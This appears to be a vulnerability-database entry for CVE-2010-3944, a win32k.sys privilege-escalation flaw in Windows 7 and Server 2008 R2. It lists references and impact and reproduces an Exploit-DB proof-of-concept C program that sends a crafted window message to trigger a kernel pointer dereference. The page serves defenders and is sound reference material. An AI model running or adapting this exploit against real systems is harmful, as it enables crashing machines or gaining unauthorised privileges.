CVE-2010-3944
Description
win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability."
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)
/*************************************************************************************
* MS10-098
* CVE-2010-3944
*
* Microsoft Windows Win32k pointer dereferencement
*
* --------------------
* Affected Software
* ------------------------
* Microsoft Windows 7 / 2008
*
*
* --------------------
* Consequences
* -----------------------
* An unprivileged user may be able to cause a bugcheck, or possibly execute
* arbitrary code by CSRSS.EXE.
*
*
*
* Credits : Stefan LE BERRE (s.leberre@sysdream.com)
* Ludo t0ka7a
*
* WebSites : http://www.sysdream.com/
* http://ghostsinthestack.org/
* http://infond.blogspot.com/
* http://twitter.com/hackinparis
*
* kd> r
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618
* eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0 nv up ei ng nz na pe nc
* cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286
* win32k!xxxRealDefWindowProc+0xf6:
* 8d72af90 c60000 mov byte ptr [eax],0 ds:0023:00013370=??
*
*************************************************************************************/
#include <stdio.h>
#include <windows.h>
#include <Winuser.h>
int main(int argc, char *argv[])
{
SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769
return 0;
}OS impact
Windows Affected 2 releases
| Version | Status | Fixed in |
|---|---|---|
| r2 | Affected | โ |
| - | Affected | โ |
References
- http://www.securitytracker.com/id?1024880
- http://www.us-cert.gov/cas/techalerts/TA10-348A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-098
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12184
- http://www.securitytracker.com/id?1024880
- http://www.us-cert.gov/cas/techalerts/TA10-348A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-098
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12184
CWEs
CWE-20
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.